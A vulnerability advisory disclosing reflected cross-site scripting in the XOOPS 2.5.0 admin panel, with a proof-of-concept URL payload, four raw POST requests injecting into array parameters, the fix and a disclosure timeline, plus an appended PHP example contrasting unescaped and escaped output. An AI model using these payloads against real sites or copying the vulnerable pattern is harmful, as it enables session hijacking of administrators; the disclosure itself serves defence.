==================================================
XOOPS 2.5.0 <= Cross Site Scripting Vulnerability
==================================================

1. OVERVIEW

XOOPS 2.5.0 and lower versions are vulnerable to Cross Site Scripting.

2. BACKGROUND

XOOPS is an acronym of eXtensible Object Oriented Portal System. It's the #1
Content Management System (CMS) project on www.sourceforge.net and a recipient
of several awards, and consistently places as a finalist in various CMS and
Open Source competitions. It incorporates many modules such as forums, photo
galleries, calendars, article management etc.

3. VULNERABILITY DESCRIPTION

Several parameters such as module/module[], memberslist_id[], newname[] and
oldname[] were not properly sanitized upon submission to the
/modules/system/admin.php URL, which allows an attacker to conduct a Cross
Site Scripting attack. This may allow an attacker to create a specially
crafted URL that would execute arbitrary script code in a victim's browser.

4. VERSIONS AFFECTED

XOOPS 2.5.0 and lower

5. PROOF-OF-CONCEPT/EXPLOIT

Parameter: module

http://localhost/xoops/modules/system/admin.php?fct=modulesadmin&op=install&module=pm%3Cimg%20src=a%20onerror=alert%28String.fromCharCode%2888,83,83%29%29%3Eaawe

Parameter: module[]

[REQUEST]
POST /xoops/modules/system/admin.php HTTP/1.1
Host: localhost
Connection: close
Referer: http://localhost/xoops/modules/system/admin.php?fct=modulesadmin
Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; xoops_user=1-549115432fcb56150b18bef08004f77d;
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

op=confirm&module%5b%5d=1">&submit=Submit&oldname%5b1%5d=System&fct=modulesadmin&newname%5b1%5d=System
[/REQUEST]

Parameter: memberslist_id[]

[REQUEST]
POST /xoops/modules/system/admin.php HTTP/1.1
Host: localhost
Connection: close
Referer: http://localhost/xoops/modules/system/admin.php?fct=users&selgroups=2
Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; xoops_user=1-549115432fcb56150b18bef08004f77d;
Content-Type: application/x-www-form-urlencoded
Content-Length: 94

memberslist_id%5b%5d=">&op=action_group&Submit=&selgroups=1&fct=mailusers&edit_group=add_group
[/REQUEST]

Parameter: newname[]

[REQUEST]
POST /xoops/modules/system/admin.php HTTP/1.1
Host: localhost
Connection: close
Referer: http://localhost/xoops/modules/system/admin.php?fct=modulesadmin
Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; xoops_user=1-549115432fcb56150b18bef08004f77d;
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

op=confirm&module%5b%5d=1&submit=Submit&oldname%5b1%5d=System&fct=modulesadmin&newname%5b1%5d=System">
[/REQUEST]

Parameter: oldname[]

[REQUEST]
POST /xoops/modules/system/admin.php HTTP/1.1
Host: localhost
Connection: close
Referer: http://localhost/xoops/modules/system/admin.php?fct=modulesadmin
Cookie: PHPSESSID=b11e32946cf66e9a6391ccbad34453af; xoops_user=1-549115432fcb56150b18bef08004f77d;
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

op=confirm&module%5b%5d=1&submit=Submit&oldname%5b1%5d=System">1bf8581e3dc&fct=modulesadmin&newname%5b1%5d=System
[/REQUEST]

6. SOLUTION

Upgrade to XOOPS 2.5.1 or higher

7. VENDOR

XOOPS Development Team
http://xoops.org

8. CREDIT

This vulnerability was discovered by Aung Khant, http://yehg.net, YGN Ethical
Hacker Group, Myanmar.

9. DISCLOSURE TIME-LINE

2011-03-10: notified vendor
2011-03-16: vendor released fixed version
2011-03-18: vulnerability disclosed

10. REFERENCES

Original Advisory URL:
http://yehg.net/lab/pr0js/advisories/[xoops_2.5.0]_cross_site_scripting

Vendor Announcement:
http://xoops.org/modules/news/article.php?storyid=5851

What XSS Can Do:
http://yehg.net/lab/pr0js/view.php/What%20XSS%20Can%20Do.pdf

XSS FAQs:
http://www.cgisecurity.com/articles/xss-faq.shtml

XSS (wiki):
http://en.wikipedia.org/wiki/Cross-site_scripting

XSS (owasp):
http://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

OWASP Top 10:
http://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project

CWE-79:
http://cwe.mitre.org/data/definitions/79.html

#yehg [2011-03-18]
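As an added example (not code from the advisory or from XOOPS), the reflection pattern described in section 3 is shown beside a hardened version: array-style parameters such as oldname[1] are echoed back into an admin confirmation form, and the fix escapes every key and value at output. The form markup and function names are assumed; the input reproduces the oldname[] value from the PoC above.

```php
<?php
// Added example, not XOOPS code: the reflection pattern behind this advisory
// beside its hardened form. The confirmation-form markup is assumed; the
// input mirrors the advisory's oldname[] request body.

// Recursively HTML-escape every scalar inside a request parameter, so that
// array-style inputs (module[], oldname[1], newname[1]) are covered element
// by element. Keys are escaped too, since they are attacker-controlled.
function escape_param($value)
{
    if (is_array($value)) {
        $clean = [];
        foreach ($value as $key => $item) {
            $clean[htmlspecialchars((string) $key, ENT_QUOTES, 'UTF-8')] = escape_param($item);
        }
        return $clean;
    }
    return htmlspecialchars((string) $value, ENT_QUOTES, 'UTF-8');
}

// Vulnerable pattern: the submitted value is echoed into the confirmation
// form unescaped, so a value containing "> closes the attribute and the tag.
function render_confirm_vulnerable(array $post)
{
    $html = '';
    foreach ($post['oldname'] ?? [] as $id => $old) {
        $html .= '<input type="hidden" name="oldname[' . $id . ']" value="' . $old . '">' . "\n";
    }
    return $html;
}

// Hardened pattern: identical markup, but every key and value is escaped
// once at the point of output, so the quote and angle bracket stay literal.
function render_confirm_fixed(array $post)
{
    $html = '';
    foreach (escape_param($post['oldname'] ?? []) as $id => $old) {
        $html .= '<input type="hidden" name="oldname[' . $id . ']" value="' . $old . '">' . "\n";
    }
    return $html;
}

// Constructed input reproducing the oldname[1] value from the advisory's PoC.
$post = ['oldname' => [1 => 'System">1bf8581e3dc']];
echo "Vulnerable:\n" . render_confirm_vulnerable($post);
echo "Fixed:\n" . render_confirm_fixed($post);
```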